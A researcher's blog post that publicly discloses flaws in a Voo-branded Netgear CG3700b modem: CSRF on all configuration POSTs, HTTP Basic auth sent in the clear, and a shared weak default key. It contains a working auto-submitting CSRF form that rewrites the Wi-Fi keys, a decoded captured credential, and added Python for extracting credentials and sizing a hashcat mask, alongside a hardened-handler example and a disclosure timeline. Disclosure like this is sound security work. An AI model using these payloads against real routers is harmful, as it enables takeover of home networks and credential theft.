Voo branded Netgear CG3700b Vulnerabilities

Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.

Voo branded Netgear CG3700b Vulnerabilities - Introduction

As 90 days have passed since I disclosed these issues to the vendor (see the timeline below), it was time for me to publicly disclose my findings and payloads.

CVEs are still pending, but I will add them to this post when I receive them.

Cross-Site Request Forgery (CSRF) on all form POSTs

The Voo branded Netgear CG3700b custom firmware (newest version at the time, V2.02.03) accepts every configuration POST to its /goform/ handlers without any anti-CSRF token or origin check, so a (context-dependent) attacker can perform a Cross-Site Request Forgery (CSRF) attack against all of them. Because the browser automatically attaches the cached HTTP Basic credential to the forged request, tricking an authenticated user into following a specially crafted link (or visiting a page that auto-submits the form) lets the attacker modify any setting, including the WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Before settings:

Netgear CG3700b Vulnerabilities - Before CSRF

Example CSRF form:

<!-- CSRF proof of concept: hosted on an attacker-controlled page. The victim's
     browser attaches its cached Basic credential, so the modem applies the
     new Wi-Fi settings without any further interaction. -->
<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value="0">
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value="20">
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value="0">
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value="20">
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value="1">
<input type="hidden" name="only_mode" value="0">
<input type="hidden" name="selected_ch_an" value="1">
</form>
<!-- Auto-submit (added here) so that merely following the link fires the POST. -->
<script>document.form0.submit();</script>

After CSRF:

Netgear CG3700b Vulnerabilities - After CSRF
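To make the missing check concrete, here is an added example (my own illustration, not the modem's firmware or the author's code) that models a /goform/ POST handler in Python two ways: as the CG3700b behaves per the description above, where any POST carrying the browser's cached Basic credential is applied, and hardened with an Origin/Referer check plus a per-session anti-CSRF token. The handler structure, the csrf_token field name, the attacker origin and the placeholder credential voo:PASSWORD are assumptions for the demo; the form field names are the ones from the PoC form.

```python
"""Added example: a model of a /goform/ POST handler, as the CG3700b behaves
(no CSRF defence) and hardened. Handler design, token field and attacker
origin are assumptions; voo:PASSWORD is the placeholder from the post."""
import base64
import binascii
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Set
from urllib.parse import urlparse

ROUTER_HOST = "192.168.0.1"                 # modem LAN address, as in the post
ADMIN_CREDENTIAL = b"voo:PASSWORD"          # placeholder credential


@dataclass
class Request:
    method: str
    headers: Dict[str, str]
    form: Dict[str, str]


def _basic_auth_ok(req: Request) -> bool:
    """Validate the Basic credential the browser attaches automatically."""
    auth = req.headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        presented = base64.b64decode(auth[6:], validate=True)
    except binascii.Error:
        return False
    return hmac.compare_digest(presented, ADMIN_CREDENTIAL)


def vulnerable_goform(req: Request, settings: Dict[str, str]) -> int:
    """Modem behaviour: any authenticated POST is applied. A cross-site form
    submission carries the cached credential, so this is all CSRF needs."""
    if req.method != "POST" or not _basic_auth_ok(req):
        return 401
    settings.update(req.form)
    return 200


class HardenedGoform:
    """Same handler with two independent CSRF checks (assumed design)."""

    def __init__(self) -> None:
        self._tokens: Set[str] = set()      # bind to the session in a real device

    def issue_token(self) -> str:
        """Embedded by the router's own settings page as a hidden field."""
        token = secrets.token_hex(16)
        self._tokens.add(token)
        return token

    def handle(self, req: Request, settings: Dict[str, str]) -> int:
        if req.method != "POST" or not _basic_auth_ok(req):
            return 401
        # Check 1: browsers send Origin on cross-site form POSTs (Referer as a
        # fallback); anything not from the router itself is rejected.
        source = req.headers.get("Origin") or req.headers.get("Referer")
        if source is None or urlparse(source).hostname != ROUTER_HOST:
            return 403
        # Check 2: an unguessable token the attacker's page cannot read.
        token = req.form.get("csrf_token", "").encode()
        if not any(hmac.compare_digest(token, t.encode()) for t in self._tokens):
            return 403
        settings.update({k: v for k, v in req.form.items() if k != "csrf_token"})
        return 200


# Constructed attacker payload: the 2.4 GHz fields from the PoC form above.
ATTACKER_FORM = {"group_parametrage_wifi": "active", "reseau_wifi_name": "NEWSSID",
                 "nom_select": "AUTO-PSK", "mot_de_passe": "NEWWPAKEY", "buttonApply": "1"}
BROWSER_AUTH = "Basic " + base64.b64encode(ADMIN_CREDENTIAL).decode()


def run_demo() -> Dict[str, object]:
    """Replay the same cross-site POST against both handlers."""
    results: Dict[str, object] = {}
    cross_site = Request("POST", {"Authorization": BROWSER_AUTH,
                                  "Origin": "http://attacker.example"},
                         dict(ATTACKER_FORM))

    settings = {"reseau_wifi_name": "VOO-SSID", "mot_de_passe": "OLDKEY"}
    results["vulnerable"] = vulnerable_goform(cross_site, settings)
    results["vulnerable_key"] = settings["mot_de_passe"]        # NEWWPAKEY

    hardened = HardenedGoform()
    settings = {"reseau_wifi_name": "VOO-SSID", "mot_de_passe": "OLDKEY"}
    results["hardened_cross_site"] = hardened.handle(cross_site, settings)
    results["hardened_key"] = settings["mot_de_passe"]          # still OLDKEY

    # A legitimate submission from the router's own page passes both checks.
    same_site = Request("POST", {"Authorization": BROWSER_AUTH,
                                 "Origin": "http://192.168.0.1"},
                        dict(ATTACKER_FORM, csrf_token=hardened.issue_token()))
    results["hardened_same_site"] = hardened.handle(same_site, settings)
    return results


if __name__ == "__main__":
    print(run_demo())
```

The Origin check alone is enough to stop the auto-submitting form above, since a browser cannot forge that header from an attacker's page; the token is the belt-and-braces defence for clients or proxies that strip Origin and Referer.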

Insufficient Authentication (OWASP-A2)

This same modem authenticates the administrative interface with HTTP Basic authentication over the default plain HTTP (no TLS) connection. Basic authentication only base64-encodes the username and password, so anyone who can see the traffic can decode the credential and log in to the router. This requires only that the attacker be on the same network and able to sniff the clear-text traffic (on a switched LAN that usually means a man-in-the-middle position such as ARP spoofing).

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

Screenshot:

Netgear CG3700b Vulnerabilities - Basic Auth

root@kali:~# cat voo.txt 
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt 
voo:PASSWORD

Shared Default Credentials - Insufficient Authentication (OWASP-A2)

The Voo Netgear CG3700b also ships with the same default key for the administrative console and for the wireless network (the WPA2 pre-shared key).

That default key is drawn from a known charset (A-Z) and is 8 characters long, which gives a keyspace of only 26^8 (roughly 2.1 x 10^11) candidates. If a WPA2 flaw made cracking the handshake simple, if the HTTP Basic credential were brute forced over that keyspace, or if any other vulnerability exposed one of the two secrets, both systems would fail instead of just one.
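As an added example for the two authentication issues above (my own illustration, not the author's tooling or the modem's code), the Python below pulls the Basic credential out of a captured request and then sizes the default A-Z, 8-character keyspace the post describes. The capture is constructed from the request shown above, with the password redacted to PASSWORD as in the post, and the 10^6 guesses per second rate is an assumed figure used only for the arithmetic.

```python
"""Added example (not from the post): pull the Basic credential out of a
captured request and size the default-password keyspace the post describes.
The capture is constructed from the request shown in the post; the guess
rate used for the time estimate is an assumption, not a measurement."""
import base64
import binascii
import re
from typing import Optional, Tuple

# Constructed capture: the same request as in the post, password redacted.
CAPTURED_REQUEST = (
    "POST http://192.168.0.1/goform/parametre_config HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "Connection: keep-alive\r\n"
    "Content-Length: 24721\r\n"
    "Cache-Control: max-age=0\r\n"
    "Authorization: Basic dm9vOlBBU1NXT1JE\r\n"
    "\r\n"
)

DEFAULT_KEY_RE = re.compile(r"^[A-Z]{8}$")   # charset and length stated in the post


def extract_basic_credentials(raw: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from a plaintext HTTP request, or None.
    Base64 is an encoding, not encryption, so no key is needed to reverse it."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        scheme, _, blob = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None                           # Digest etc.: not trivially reversible
        try:
            decoded = base64.b64decode(blob.strip(), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None
        user, _, password = decoded.partition(":")   # password itself may contain ':'
        return user, password
    return None


def looks_like_default_key(password: str) -> bool:
    """True when the credential has the factory-default shape (8 x A-Z)."""
    return bool(DEFAULT_KEY_RE.match(password))


def keyspace(alphabet_size: int, length: int) -> int:
    return alphabet_size ** length


def hashcat_mask(length: int) -> str:
    """hashcat mask for an all-uppercase key: ?u is the built-in A-Z charset."""
    return "?u" * length


def worst_case_seconds(space: int, guesses_per_second: float) -> float:
    return space / guesses_per_second


def analyse(raw: str) -> dict:
    """Tie the two findings together: a sniffed admin credential that also
    matches the default key format is, by default, the WPA2 PSK as well."""
    creds = extract_basic_credentials(raw)
    if creds is None:
        return {"credential": None}
    user, password = creds
    space = keyspace(26, 8)
    return {
        "credential": (user, password),
        "default_format": looks_like_default_key(password),
        "keyspace": space,
        "mask": hashcat_mask(8),
        # Assumed rate for the estimate only; real throughput depends on hardware
        # and on whether the target is an offline WPA2 handshake or online HTTP.
        "worst_case_hours_at_1e6_per_s": worst_case_seconds(space, 1e6) / 3600,
    }


if __name__ == "__main__":
    print(analyse(CAPTURED_REQUEST))
```

The same extraction applies to any Basic credential seen on the wire; the mask and keyspace figures are specific to the default format described above and say nothing about a user-chosen password.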

Disclosure Timeline

  • 2016-01-22 - Discovered vulnerability, initially notified vendor.
  • 2016-01-23 - Requested CVE.
  • 2016-03-07 - Contacted vendor again, they notified me that they will not fix these issues at this time.
  • 2016-04-20 - Attempted to contact Mitre again to receive CVE.
  • 2016-04-21 - Sent to Full Disclosure.
  • 2016-04-23 - Additional information and full disclosure published here.
  • 2016-04-26 - Resent to Full Disclosure due to some errors.
  • 2019-06-20 - Requested CVEs again with the new form.

Voo branded Netgear CG3700b Vulnerabilities - Conclusion

All in all, a fun weekend, and a few good findings.

The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.

I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included
